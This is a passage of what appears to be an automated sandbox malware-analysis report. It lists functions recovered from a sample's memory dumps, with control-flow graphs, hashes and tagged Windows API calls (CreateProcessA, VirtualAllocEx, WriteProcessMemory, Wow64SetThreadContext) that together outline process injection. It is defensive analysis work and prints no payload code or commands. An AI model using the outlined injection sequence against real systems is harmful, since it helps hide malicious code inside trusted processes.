968->971 972 57fcc42 969->972 970->967 971->969 972->972
                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 057FCB77
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 55c5287c46bfc4774f95558a62f195a7ab105381c032fff15fb9c0587c50648b
                            • Instruction ID: 6583b59c5bce26848446c512221ad6c436b35b17e161a800e42d70158ad74c87
                            • Opcode Fuzzy Hash: 55c5287c46bfc4774f95558a62f195a7ab105381c032fff15fb9c0587c50648b
                            • Instruction Fuzzy Hash: D0A121B0D0821CCFDB11CFA9C885BEEBBB5BB49304F10916AE959A7380DB349981DF55
                            Function 057FC910 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 973 57fc910-57fc9a2 975 57fc9eb-57fca13 973->975 976 57fc9a4-57fc9bb 973->976 979 57fca59-57fcaaf 975->979 980 57fca15-57fca29 975->980 976->975 981 57fc9bd-57fc9c2 976->981 989 57fcaf5-57fcb8a CreateProcessA 979->989 990 57fcab1-57fcac5 979->990 980->979 991 57fca2b-57fca30 980->991 982 57fc9e5-57fc9e8 981->982 983 57fc9c4-57fc9ce 981->983 982->975 986 57fc9d2-57fc9e1 983->986 987 57fc9d0 983->987 986->986 988 57fc9e3 986->988 987->986 988->982 1003 57fcb8c-57fcb92 989->1003 1004 57fcb93-57fcc09 989->1004 990->989 998 57fcac7-57fcacc 990->998 992 57fca53-57fca56 991->992 993 57fca32-57fca3c 991->993 992->979 995 57fca3e 993->995 996 57fca40-57fca4f 993->996 995->996 996->996 999 57fca51 996->999 1000 57fcaef-57fcaf2 998->1000 1001 57fcace-57fcad8 998->1001 999->992 1000->989 1005 57fcadc-57fcaeb 1001->1005 1006 57fcada 1001->1006 1003->1004 1012 57fcc0b-57fcc0f 1004->1012 1013 57fcc19-57fcc1d 1004->1013 1005->1005 1007 57fcaed 1005->1007 1006->1005 1007->1000 1012->1013 1014 57fcc11 1012->1014 1015 57fcc1f-57fcc23 1013->1015 1016 57fcc2d-57fcc31 1013->1016 1014->1013 1015->1016 1019 57fcc25 1015->1019 1017 57fcc33-57fcc37 1016->1017 1018 57fcc41 1016->1018 1017->1018 1020 57fcc39 1017->1020 1021 57fcc42 1018->1021 1019->1016 1020->1018 1021->1021
                            APIs
                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 057FCB77
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: eff3309a39c644bc95ae4a803f8e2f3e695cadf93f68f152c9910b09c713f75a
                            • Instruction ID: 412449a9f4fc024ed7385c79aeb7b414a9dcaf758e09b8eac7896ab812c8d12e
                            • Opcode Fuzzy Hash: eff3309a39c644bc95ae4a803f8e2f3e695cadf93f68f152c9910b09c713f75a
                            • Instruction Fuzzy Hash: D4A120B0D0821CCFDB11CFA9C885BEEBBB5BB09304F10916AE959A7340DB349985DF95
                            Function 057FD380 Relevance: 1.6, APIs: 1, Instructions: 117injectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1333 57fd380-57fd3f3 1335 57fd40a-57fd46b WriteProcessMemory 1333->1335 1336 57fd3f5-57fd407 1333->1336 1338 57fd46d-57fd473 1335->1338 1339 57fd474-57fd4c6 1335->1339 1336->1335 1338->1339
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 057FD45B
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 42102d5490e4b25524bdb1d8cd09e6c5ef3ecb22e7edb397141c51cbad0f2a57
                            • Instruction ID: dbd23dd53d39212ca23199cefa117b2de08f65bea812d255c28a0c9aced03350
                            • Opcode Fuzzy Hash: 42102d5490e4b25524bdb1d8cd09e6c5ef3ecb22e7edb397141c51cbad0f2a57
                            • Instruction Fuzzy Hash: 2741ABB5D012589FDF10CFA9D984AEEFBF1BB49310F14902AE818BB200D734AA45DF64
                            Function 057FD388 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1344 57fd388-57fd3f3 1346 57fd40a-57fd46b WriteProcessMemory 1344->1346 1347 57fd3f5-57fd407 1344->1347 1349 57fd46d-57fd473 1346->1349 1350 57fd474-57fd4c6 1346->1350 1347->1346 1349->1350
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 057FD45B
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: d25d504d3ca7e5b403df879e2c3015364c20500b69499249019c9bce37679391
                            • Instruction ID: 82cd66c84cbcc21c1b027c485f2ba00cbdc2ecab8887036fe49d9f00f7579b68
                            • Opcode Fuzzy Hash: d25d504d3ca7e5b403df879e2c3015364c20500b69499249019c9bce37679391
                            • Instruction Fuzzy Hash: E5419BB5D012589FDF10CFA9D984AEEFBF1BB49310F14902AE919B7200D735A945CB64
                            Function 057FD220 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1375 57fd220-57fd2e2 VirtualAllocEx 1379 57fd2eb-57fd335 1375->1379 1380 57fd2e4-57fd2ea 1375->1380 1380->1379
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 057FD2D2
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 947b426cf4b07bb4375ecf61cbe97be63cf21b3370dea48481a9ec1c530ba529
                            • Instruction ID: 8edc231e1778b81d5ab219af59414695cdad059cc06721d1a0ca3ccc536c2407
                            • Opcode Fuzzy Hash: 947b426cf4b07bb4375ecf61cbe97be63cf21b3370dea48481a9ec1c530ba529
                            • Instruction Fuzzy Hash: 8E4197B9D04258EFDF10CFA9D980A9EBBB1BF49310F10942AE915B7310D735A902CF69
                            Function 057FD228 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 057FD2D2
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: cd3508a7b2348462b68825fda45b27238ed40df36dc66a55c8ba2229c9b69197
                            • Instruction ID: 522c8668ead1170a45f491c959477ee7ad72ac5ffef3479f8905453d6fb6b616
                            • Opcode Fuzzy Hash: cd3508a7b2348462b68825fda45b27238ed40df36dc66a55c8ba2229c9b69197
                            • Instruction Fuzzy Hash: 8D3185B9D04258DFDF10CFA9D980A9EFBB5BB49310F10A42AE915B7310D735A906CF68
                            Function 057FD873 Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 057FD91C
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: c3c95677263763b44b14814c6f22e3df45b990f227666229e0c5fc175beba4c2
                            • Instruction ID: 81c89b41dde005310d494a401a6e188e170af4cb908fe8b17fdc09531f325515
                            • Opcode Fuzzy Hash: c3c95677263763b44b14814c6f22e3df45b990f227666229e0c5fc175beba4c2
                            • Instruction Fuzzy Hash: B431B9B5D05258AFDF10CFAAD884AEEFBB1BB49310F14942AE815B7210C735A945CF68
                            Function 057FD878 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 057FD91C
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: f7b64a250b13e263e4e958bcd362337ae1280ba2d755ce6b788ca3429fb22a44
                            • Instruction ID: f9c48f085bbea1217421f0792543154b5c518bdc73ac606aadf3ac71db6a6b66
                            • Opcode Fuzzy Hash: f7b64a250b13e263e4e958bcd362337ae1280ba2d755ce6b788ca3429fb22a44
                            • Instruction Fuzzy Hash: 9331B9B4D052589FDF10CFA9D884AEEFBB1BB49310F14902AE815B7210C735A945CF58
                            Function 0580D490 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0580D534
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304289784.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5800000_doc1.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 1e0e6cfafdd90e37e321c29c40e1529403da77cab6487d43a1ae3fe301e4a1c4
                            • Instruction ID: 178dcb88342a4da142c7ce4743aa05b8e16ce8c79b2c125b130f70e0011771e1
                            • Opcode Fuzzy Hash: 1e0e6cfafdd90e37e321c29c40e1529403da77cab6487d43a1ae3fe301e4a1c4
                            • Instruction Fuzzy Hash: 5E31A7B9D01248EFDF10CFA9D980AAEFBB1BF49310F20902AE815B7210D735A945CF58
                            Function 057FCCC0 Relevance: 1.6, APIs: 1, Instructions: 95threadCOMMON
                            Download Yara Rule
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 057FCD77
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: ef1519291ed8351a626ff5191386acbfe02a7db2940a471200d19821c74dddb7
                            • Instruction ID: 933b1da7962962d09df4295bc45f0c681bf335d2b8d5cf43185d079b554d4d67
                            • Opcode Fuzzy Hash: ef1519291ed8351a626ff5191386acbfe02a7db2940a471200d19821c74dddb7
                            • Instruction Fuzzy Hash: 1A41A9B5D052589FDB10CFAAD885AAEBBF1BF49310F24802AE419B7240D738A945CF64
                            Function 057FCCC8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                            Download Yara Rule
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 057FCD77
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 4c6bb5340260f0a5b6e8ceea8919d6412da617cdd37c21e43ea4ba34dec1971d
                            • Instruction ID: 0b26c8a38b8197fb0b98ab1c3d288fc5de4a6972a6a94bf89ef39941f136c84d
                            • Opcode Fuzzy Hash: 4c6bb5340260f0a5b6e8ceea8919d6412da617cdd37c21e43ea4ba34dec1971d
                            • Instruction Fuzzy Hash: 6B31A8B5D052589FDB10CFAAD885AAEBBF5BF49310F24802AE419B7240C738A945CF64
                            Function 057E5E18 Relevance: 1.6, Strings: 1, Instructions: 343COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: d
                            • API String ID: 0-2564639436
                            • Opcode ID: dc00869fd427bcecac5f58e42737e08cfdca3c549584840e95b8dab497f792e9
                            • Instruction ID: 586bb54528463db3ffefbbc1c1b51e0c0c342018935aae59470b32078b448330
                            • Opcode Fuzzy Hash: dc00869fd427bcecac5f58e42737e08cfdca3c549584840e95b8dab497f792e9
                            • Instruction Fuzzy Hash: 86D17A30600715CFCB25CF29D484D6ABBF2FF88324B55CA69E55A9B252DB30F846DB90
                            Function 057F8F20 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: e7ac030e2c2fdcd2e4761717b75f48223a0ad26b4bcf4f5ec5b88a18fab64cf2
                            • Instruction ID: 0c255e383371a4e37cd2c4649c35f4ed4850856e1ff58c291e2f25197b41151b
                            • Opcode Fuzzy Hash: e7ac030e2c2fdcd2e4761717b75f48223a0ad26b4bcf4f5ec5b88a18fab64cf2
                            • Instruction Fuzzy Hash: 3831DBB4D012189FDB10CFA9D881AAEFBF1BB49310F10802AE914B7300C735A945CFA4
                            Function 057F8F28 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: a9015f5e1727c30ee48ceb89cfb3463fa7adbadaf722b69ce8e93e3acd646857
                            • Instruction ID: 2c2afc96cc38a3130e1d38d2c60f3beff06aa268e17304ec33c05d427a273a8e
                            • Opcode Fuzzy Hash: a9015f5e1727c30ee48ceb89cfb3463fa7adbadaf722b69ce8e93e3acd646857
                            • Instruction Fuzzy Hash: 1F31CBB4D052589FDB10CFA9D980A9EFBF5BB49310F14842AE514B7300D735A945CF54
                            Function 057FD4D0 Relevance: 1.6, APIs: 1, Instructions: 64injectionCOMMON
                            Download Yara Rule
                            APIs
                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 057FD45B
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 515c7f293e8ba63b30422d6a095a25f9b84c424ef43f6bba11ba08daddd37a04
                            • Instruction ID: 9eeed0cf35ac6d6cf3ce548aceeb946aa8dab17ff92b4cc65585a33fce6bac1a
                            • Opcode Fuzzy Hash: 515c7f293e8ba63b30422d6a095a25f9b84c424ef43f6bba11ba08daddd37a04
                            • Instruction Fuzzy Hash: DE1155B6C06258DFDB10EFA8E854BACFBB0AB90310F24442AE949A7390D7786941DB51
                            Function 05819037 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: f5102c7d361b35dbb50a0d2bbee3f4613427a08cab86c527e39040e07ea3aa38
                            • Instruction ID: c400611de4491315d53e6957e422a5d8881afc4bf24a1dd67f9fff47dd349d71
                            • Opcode Fuzzy Hash: f5102c7d361b35dbb50a0d2bbee3f4613427a08cab86c527e39040e07ea3aa38
                            • Instruction Fuzzy Hash: A2B14674A01218CFDB14EF68D854BAEBBB6FF89300F1094A9D91AA7398DB315D85CF41
                            Function 057626F8 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 8ce812536f20716a9d8011f816eda89c6b01c1e037322c6fd45e1889f43b55bd
                            • Instruction ID: 9e2bc7311170325c1dee2bae61bf52a9ba4fc9804bfcc408bbc77a14276d5428
                            • Opcode Fuzzy Hash: 8ce812536f20716a9d8011f816eda89c6b01c1e037322c6fd45e1889f43b55bd
                            • Instruction Fuzzy Hash: 5CB11338E05209DFCB94DFA8C454BADBBB6FF49300F148029D816AB286D7305986DF52
                            Function 05819FB5 Relevance: 1.5, Strings: 1, Instructions: 242COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 4d2445b4f1b25cccb032d8dddbb9cea26cf3b04a168f01f2681d7063681c91a7
                            • Instruction ID: 38bea107ed86420116988ea6c3b2fd72eb3b1b74d906c500d50653b4c570d933
                            • Opcode Fuzzy Hash: 4d2445b4f1b25cccb032d8dddbb9cea26cf3b04a168f01f2681d7063681c91a7
                            • Instruction Fuzzy Hash: E7B1E2B4E06218CFDB14DF69D994BADBBBAFB89304F1090A9D809A7394DB305D85CF05
                            Function 058168DE Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: dc9b04323ce620f7d481e919ead0a5c556d572c44803d302b4776f04ff75749c
                            • Instruction ID: 5e03669132c3f5232539568f16187d2e3f3033e559040a97e2e55102e8affdaf
                            • Opcode Fuzzy Hash: dc9b04323ce620f7d481e919ead0a5c556d572c44803d302b4776f04ff75749c
                            • Instruction Fuzzy Hash: FCC1E4B4A05219CFDB64DF69D854B9DBBB6FB88300F1085AAC84AA7794EB305D81CF40
                            Function 05816A15 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 4c1de3081f8f4a3f573c28cefc340ee3be3da3509a9a07b0d92263cf7801c540
                            • Instruction ID: eacfb8f11493c42156671411c1dbb86c7fa8b4b6735536031ec300d5a1621feb
                            • Opcode Fuzzy Hash: 4c1de3081f8f4a3f573c28cefc340ee3be3da3509a9a07b0d92263cf7801c540
                            • Instruction Fuzzy Hash: 26A1F574905219CFDB64DF69D894BADBBB6FB88300F1081AAD84AA7694EB305DC1CF44
                            Function 05816987 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: c10e0e2ecedad4c8a3c1a81fb844cf25fde4a65618d6bb88c943606ec11fef4d
                            • Instruction ID: 75d4a47c0fe2721fa75002bb522f4cac60b1bfbd460d6943cae42177481611ba
                            • Opcode Fuzzy Hash: c10e0e2ecedad4c8a3c1a81fb844cf25fde4a65618d6bb88c943606ec11fef4d
                            • Instruction Fuzzy Hash: 1EA1E6B4A05219CFDB64DF69D854B9DBBB6FB88300F1081AAC84AA7794EB305DC5CF40
                            Function 05816A44 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: b59fedb8d26e8b8022d25339685b6765630f2a016aeaf5b97ecf3b9c179c00bd
                            • Instruction ID: 270aff3fbd4067d908e3e8d32e8e99bb6957f2b0acae03ee7ec3770357d7d660
                            • Opcode Fuzzy Hash: b59fedb8d26e8b8022d25339685b6765630f2a016aeaf5b97ecf3b9c179c00bd
                            • Instruction Fuzzy Hash: 45A1E474A05219CFDB64DF69D894B9DBBB6FB88300F1081AAC84AA7794EB305DC5CF40
                            Function 0581695A Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 1404f127f48f6355ea90cec516bbe770a54d6107fd4d318826f9e26302952a1e
                            • Instruction ID: 18bbbd12ce2bfff53ebe488eeb603062c20dbd725c81de982ff0531df76a77d2
                            • Opcode Fuzzy Hash: 1404f127f48f6355ea90cec516bbe770a54d6107fd4d318826f9e26302952a1e
                            • Instruction Fuzzy Hash: 1191D474A05219CFDB64DF69D854B9DBBB6FB88300F1081AAC85AA7794EB305DC5CF40
                            Function 05818F00 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 7a6970d9e83740acab0f37a9737f7854e0950ec0b65a48cab20d003f6bb49d37
                            • Instruction ID: 2fe09faead0f9c8fc832c5d0553b8b7c1d167687157b7e6249c047b5cc207b28
                            • Opcode Fuzzy Hash: 7a6970d9e83740acab0f37a9737f7854e0950ec0b65a48cab20d003f6bb49d37
                            • Instruction Fuzzy Hash: BA713574A05218CFDB14DF68D854BAEBBBAFF89300F1090A9D91AA7394DB305D85CF45
                            Function 05818EF0 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: b7c8b48cdf76aafa9397f33272cab0826fe8ac718cc2dc32c675e7a7f4053dd0
                            • Instruction ID: ec74f8e4263e36d1202df2110b57efed6b2a2eecab1aad281ca2b1a4361754b0
                            • Opcode Fuzzy Hash: b7c8b48cdf76aafa9397f33272cab0826fe8ac718cc2dc32c675e7a7f4053dd0
                            • Instruction Fuzzy Hash: 07712474A05218CFDB14DF68D854BAEBBB6FF89300F1090A9D91AAB398DB305D85CF45
                            Function 05816977 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 1bea527b16b6f50465c28b36a326422acef0059d26e3d3a774781cafb0c4c324
                            • Instruction ID: cfea9afa7137a5687e38be3f88f6eebb9c4339004bbb28a2ff0e6a9594476674
                            • Opcode Fuzzy Hash: 1bea527b16b6f50465c28b36a326422acef0059d26e3d3a774781cafb0c4c324
                            • Instruction Fuzzy Hash: 6791F474A05219CFDB64DF69D854BADBBB6FB88300F1081AAC84AA7794EB305DC5CF44
                            Function 05816939 Relevance: 1.4, Strings: 1, Instructions: 174COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 77844d72df1ac03584a05c2b71140d06701427179fd22eb44385e0724c37d275
                            • Instruction ID: 3c70f98b02201702969d0950ca90f8e58d093b9ad2e66a3aca57b6adf71f299d
                            • Opcode Fuzzy Hash: 77844d72df1ac03584a05c2b71140d06701427179fd22eb44385e0724c37d275
                            • Instruction Fuzzy Hash: 6791D474A05219CFDB64DF69D854B9DBBB6FF88300F1081AAC85AA7794EB305D85CF40
                            Function 058105CD Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 4aa345e9912864110596de617fa4d8ec519bfe6de118c06c88ae6d154d9241f5
                            • Instruction ID: a046e91fdd5970ea586452292cf6878b8c7a64d77c92633fabc0e7d20f07f6e8
                            • Opcode Fuzzy Hash: 4aa345e9912864110596de617fa4d8ec519bfe6de118c06c88ae6d154d9241f5
                            • Instruction Fuzzy Hash: 7081C0B4905318CFEB54CF65D958BEDBBF6AB49304F2080AAD809B7291DB349E85CF14
                            Function 05764DF8 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-2740779761
                            • Opcode ID: 55ceecd9f601d5f3d1bd59f1b934f5762839aa6c23d47c01cc2d6419e84bd56d
                            • Instruction ID: e2c75885e64d4e4e2f142a4fa9ef8d87c71344f2a016c76bc7abaf0650ed55b3
